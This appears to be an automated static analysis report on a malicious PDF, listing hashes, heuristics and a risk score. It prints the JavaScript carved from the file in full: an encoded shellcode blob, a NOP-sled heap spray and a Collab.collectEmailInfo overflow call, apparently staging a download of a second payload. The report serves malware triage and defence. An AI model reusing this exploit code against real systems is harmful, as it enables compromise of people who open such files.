Malicious PDF — malware analysis report

Static analysis result for SHA-256 fd0425507e8557d7…

MALICIOUS

PDF

6.1 KB Created: 2010-02-19 21:11:20 +03:00 First seen: 2026-05-10
MD5: 70cc4fd7074a4e1732d7f2a7c9918de3 SHA-1: 4e912405e15bf2bafb3175ab48bef9296b40edcb SHA-256: fd0425507e8557d7385274fc64fbc701e835bdc1bf33f43a68fc9e8ef5f7ed77
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript streams, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests that the JavaScript content has been obfuscated using unescape() and then decoded. One of the extracted JavaScript files is named 'javascript_obj111111_000.js', which is flagged as a suspicious extracted artifact due to its size and obfuscation. The presence and obfuscation of JavaScript strongly suggest an attempt to download and execute a second-stage payload. No specific family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    bpdqcz=unescape(bpdqcz);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111111_000.js pdf-javascript-stream PDF /JS object 111111 at offset 0x1C9 2198 bytes
SHA-256: 62582092a7f0b38937bfe57e6417848c34d13560c3a36f85ca7b1af6168aa2f8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var bpdqcz = 'ARG0c0cARG0c0c'.replace(/ARG/g,'%u');
var xnytel = 'ARG9090ARG9090'.replace(/ARG/g,'%u');
var hmkzbq = 'Z535XZ5251Z5756Z9c55ZXXe8ZXXXXZ5dXXZed83Z31XdZ64cXZ4XX3Z783XZ8bXcZXc4XZ7X8bZad1cZ4X8bZebX8Z8bX9Z344XZ4X8dZ8b7cZ3c4XZ5756Z5ebeZXXX1ZX1XXZbfeeZX14eZXXXXZefX1Zd6e8ZXXX1Z5fXXZ895eZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX263ZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZ78c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX26eZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZa6c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z9dXXZ5f5dZ5a5eZ5b59Zc358ZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ6547Z5474Z6d65Z5X7XZ7461Z4168Z4cXXZ616fZ4c64Z6269Z6172Z7972ZXX41Z6547Z5X74Z6f72Z4163Z6464Z6572Z7373Z57XXZ6e69Z7845Z6365ZbbXXZf289Zf789ZcX3XZ75aeZ29fdZ89f7Z31f9ZbecXZXX3cZXXXXZb5X3ZX21bZXXXXZad66Z85X3ZX21bZXXXXZ7X8bZ8378Z1cc6Zb5X3ZX21bZXXXXZbd8dZX21fZXXXXZX3adZ1b85ZXXX2ZabXXZX3adZ1b85ZXXX2Z5XXXZadabZ85X3ZX21bZXXXXZ5eabZdb31Z56adZ85X3ZX21bZXXXXZc689Zd789Zfc51Za6f3Z7459Z5eX4Zeb43Z5ee9Zd193ZX3eXZ2785ZXXX2Z31XXZ96f6Zad66ZeXc1ZX3X2Z1f85ZXXX2Z89XXZadc6Z85X3ZX21bZXXXXZebc3ZXX1XZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ89XXZ1b85ZXXX2Z56XXZe857Zff58ZffffZ5e5fZX1abZ8XceZbb3eZX274ZedebZ55c3Z4c52Z4f4dZ2e4eZ4c44ZXX4cZ5255Z444cZ776fZ6c6eZ616fZ5464Z466fZ6c69Z4165Z7XXXZ6664Z7X75Z2e64Z7865ZXX65Z7263Z7361Z2e68Z687XZXX7XZ7468Z7X74Z2F3AZ642FZ7265Z6166Z6773Z6E2EZ7465Z3X2FZ2F36Z2E6CZ687XZ3F7XZ3D69ZXX34Z9XXX'.replace(/Z/g,'%u').replace(/X/g,'0');
bpdqcz=unescape(bpdqcz);
xnytel=unescape(xnytel);
hmkzbq=unescape(hmkzbq);
while (xnytel.length * 2 < 0x3fffc8-hmkzbq.length * 2){xnytel += xnytel;}
xnytel = xnytel.substr(0, (0x3fffc8-hmkzbq.length * 2) / 2);
var iqilkn = new Array();
for (var etclfr = 0; etclfr < 47; etclfr ++ ){iqilkn[etclfr] = xnytel + hmkzbq;}
while (bpdqcz.length < 44952){bpdqcz += bpdqcz;}
javascript_obj111112_001.js pdf-javascript-stream PDF /JS object 111112 at offset 0x5A0 66 bytes
SHA-256: 8fac9342807d965a8b2fbc1e85e9da5227708e2a2c7c3a1f58b6510c4b86d28d
Preview script
First 1,000 lines of the extracted script
this.collabStore = Collab.collectEmailInfo({subj:"", msg:bpdqcz});

Open this report in the interactive analyzer, or submit your own file for analysis.